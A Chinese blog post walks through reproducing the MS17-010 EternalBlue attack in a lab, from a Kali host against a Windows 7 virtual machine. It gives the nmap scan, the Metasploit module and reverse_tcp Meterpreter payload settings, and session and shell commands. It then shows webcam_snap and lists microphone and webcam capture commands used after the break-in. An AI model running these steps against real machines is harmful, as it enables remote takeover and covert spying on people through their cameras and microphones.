MS17_010 永恒之蓝复现

0x717866

已于 2023-10-21 19:40:45 修改

阅读量4.1w

点赞数 3

CC 4.0 BY-SA版权

分类专栏： msf 文章标签： kali linux 安全渗透测试安全漏洞 1024程序员节

于 2021-07-27 15:14:13 首次发布

本文链接：https://blog.youkuaiyun.com/qq_39583774/article/details/119122695

msf 专栏收录该内容

4 篇文章

订阅专栏

环境

主机	IP
kali	192.168.252.128
windos7	192.168.252.139

漏洞介绍

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

Metasploit渗透测试模块

Metasploit介绍及命令：https://blog.youkuaiyun.com/qq_39583774/article/details/119144119

启动方法：msfconsole

在这里插入图片描述
主机探测

nmap -sV 192.168.252.139

在这里插入图片描述

查找模块ms17-010

search ms17-010

在这里插入图片描述
使用方法：

use exploit/windows/smb/ms17_010_eternalblue #选择模块
set rhost 192.168.252.138 #设置攻击目标ip
set lhost 192.168.252.128 #设置kali ip
set payload windows/x64/meterpreter/reverse_tcp #攻击模块装载
run #开始攻击

在这里插入图片描述

这里已经渗透成功使用命令模块
Stdapi: Webcam Commands

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

sessions -I  #可以查看控制的计算机
sessions -I id  #进入以控制的计算机
background  #退回上一级
shell  #建立shell

因为windos7 系统是中文会出现乱码
chcp 65001#可以解决

在这里插入图片描述

尝试使用获取windos 7 的摄像头

先决条件：windos7有摄像头，并能够使用。

这里使用虚拟机连接真实机摄像头
在这里插入图片描述
这里拍了一张照片，我拿手挡住了，建议大家还是把笔记本电脑的摄像头拿东西挡住。

webcam_snap

在这里插入图片描述

MS17_010 永恒之蓝复现

环境

漏洞介绍

Metasploit渗透测试模块

这里已经渗透成功使用命令模块 Stdapi: Webcam Commands

尝试使用获取windos 7 的摄像头

这里已经渗透成功使用命令模块
Stdapi: Webcam Commands